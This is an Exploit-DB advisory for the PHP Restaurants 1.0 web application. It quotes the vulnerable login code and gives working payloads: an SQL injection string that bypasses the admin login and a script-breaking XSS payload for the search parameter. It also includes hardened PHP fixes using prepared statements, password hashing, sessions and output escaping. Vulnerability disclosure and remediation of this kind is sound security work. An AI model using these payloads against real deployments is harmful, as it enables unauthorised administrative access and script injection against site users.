source link: https://www.exploit-db.com/exploits/51398

PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

EDB-ID: 51398

Platform: PHP

Date: 2023-05-02

# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0


functions.php

function login(){
    global $conn;
    $email = $_POST['email'];
    $pw = $_POST['password'];

    // <-- there is no filter to secure the SQL query: the POST parameters
    //     email and password are concatenated straight into it
    $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
            header('location: index.php');
        }
    } else {
        header('location: login.php?m=Wrong Password');
    }
}

Login bypass at the admin page /rest1/admin/login.php

email & password : ' OR 1=1 --             <- add a [space] at the end of the payload
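The root cause above is string concatenation of untrusted POST values into the SQL text, compounded by unsalted md5() for the stored password and a client-editable `uid` cookie as the login token. The following is an added example, not code from the PHP Restaurants project, showing a hardened replacement for `login()`. It assumes `$conn` is a mysqli connection, `session_start()` has already been called, and the `users` table has a `password_hash` column holding `password_hash()` output (the original schema stores the md5 value in `password`); the function name `login_secure` is chosen for this example.

```php
<?php
// Added example (not from the PHP Restaurants project): a hardened
// replacement for functions.php login(). Assumptions: $conn is a mysqli
// connection, session_start() has already run, and the `users` table
// has a `password_hash` column holding password_hash() output instead
// of the md5() value the original stores in `password`.

function login_secure(mysqli $conn): bool
{
    $email = (string)($_POST['email'] ?? '');
    $pw    = (string)($_POST['password'] ?? '');

    // A placeholder keeps the input out of the SQL text: a value such as
    // ' OR 1=1 --  is compared literally against `email`, never parsed
    // as part of the statement.
    $stmt = $conn->prepare(
        "SELECT `id`, `password_hash` FROM `users` WHERE `email` = ? LIMIT 1"
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->bind_result($id, $hash);
    $found = $stmt->fetch();   // true when a row was returned
    $stmt->close();

    // password_verify() is constant-time and handles the salted bcrypt /
    // argon2 hashes that password_hash() produces. A missing account and a
    // wrong password share one failure path, so the redirect message does
    // not reveal which of the two it was.
    if ($found !== true || !password_verify($pw, $hash)) {
        header('Location: login.php?m=Invalid credentials');
        return false;
    }

    // Bind the login to a server-side session rather than a client-editable
    // uid cookie; regenerating the id on login prevents session fixation.
    session_regenerate_id(true);
    $_SESSION['uid'] = (int)$id;
    header('Location: index.php');
    return true;
}
```

With the query parameterised, the `' OR 1=1 -- ` value is simply an email address that matches no row. Existing md5-stored accounts can be migrated by rehashing with `password_hash()` on their next successful login or by forcing a password reset; the example does not include that migration path.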

Cross-site scripting on the main page /index.php

xhttp.open("GET", "functions.php?f=getRestaurants<?php
  if(isset($_GET['search'])) echo '&search='.$_GET['search']; // <-- here we can insert our xss payload
?>
  ", true);
xhttp.send();

</script>

When you insert your payload, don't forget to add </script> at the start, like:

xss payload : </script><img onerror=alert(1) src=a>
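The `search` parameter is echoed unescaped into a JavaScript string literal inside a `<script>` block, which is why a leading `</script>` in the value ends the script early and the rest is parsed as HTML. The following is an added example, not code from the PHP Restaurants project, showing how index.php could build that request argument safely; the function name `build_search_js` is an assumption for this example.

```php
<?php
// Added example (not from the PHP Restaurants project): building the
// JavaScript argument for the getRestaurants request so the `search`
// parameter can neither break out of the string literal nor close the
// <script> block. The function name build_search_js is an assumption.

function build_search_js(?string $search): string
{
    if ($search === null || $search === '') {
        return '""';
    }
    // rawurlencode() turns the value into a percent-encoded URL component:
    // functions.php still receives the original text via $_GET['search'],
    // but < > " ' & and / never appear in the emitted script source.
    $qs = '&search=' . rawurlencode($search);

    // json_encode() yields a valid JS string literal; the HEX flags are
    // defence in depth and escape < > & ' " as \uXXXX, so even a value that
    // somehow bypassed the encoding above could not emit "</script>".
    $js = json_encode($qs, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $js === false ? '""' : $js;   // invalid UTF-8 -> empty string literal
}

$raw = $_GET['search'] ?? null;
$searchJs = build_search_js(is_string($raw) ? $raw : null);
?>
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "functions.php?f=getRestaurants" + <?php echo $searchJs; ?>, true);
xhttp.send();
</script>
```

For the payload quoted above, `build_search_js` emits the literal `"\u0026search=%3C%2Fscript%3E%3Cimg%20onerror%3Dalert%281%29%20src%3Da%3E"`: the browser concatenates it into the request URL, the server decodes it back to the original text, and at no point does a `<` or a closing tag reach the HTML parser.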
            
